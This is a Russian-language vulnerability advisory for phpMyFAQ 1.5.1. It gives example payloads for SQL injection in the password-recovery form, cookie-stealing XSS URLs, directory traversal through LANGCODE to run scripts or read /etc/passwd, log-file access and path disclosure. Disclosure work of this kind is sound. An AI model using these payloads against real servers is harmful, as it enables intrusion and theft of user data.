Программа: phpMyFAQ 1.5.1 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды и PHP сценарии на целевой системе.

1. SQL-инъекция обнаружена в сценарии ‘/admin/password.php’ из-за недостаточной обработки входных данных. При выключенной опции PHP magic quotes удаленный пользователь может выполнить произвольные SQL команды на системе. Пример формы восстановления пароля:

user: ‘ or isnull(1/0) /*
mail: [your_email]

2. Удаленный пользователь может произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. 

Пример:

http://[target]/[path]/phpmyfaq/admin/footer.php? PMF_CONF[version]=<script>alert(document.cookie)
</script>

http://[target]/[path]/phpmyfaq/admin/header.php? PMF_LANG[metaLanguage]="><script>alert(document.cookie)
</script>

3. Удаленный пользователь может выполнить произвольный PHP сценарий на системе с помощью символов обхода каталога. 

Пример:

http://[target]/[path]/phpmyfaq/index.php? LANGCODE=/../../../../[scriptname]

http://[target]/[path]/phpmyfaq/index.php? LANGCODE=/../../ ../../../../etc/passwd%00 

4. Удаленный пользователь может получить доступ к лог файлу. Пример:

http://[target]/[path]/phpmyfaq/data/tracking[date]

5. Удаленный пользователь может получить данные об установочной директории приложения на сервере. Пример:

http://[target]/[path]/phpmyfaq/index.php?LANGCODE=[a_non_existent_file]



Оставить мнение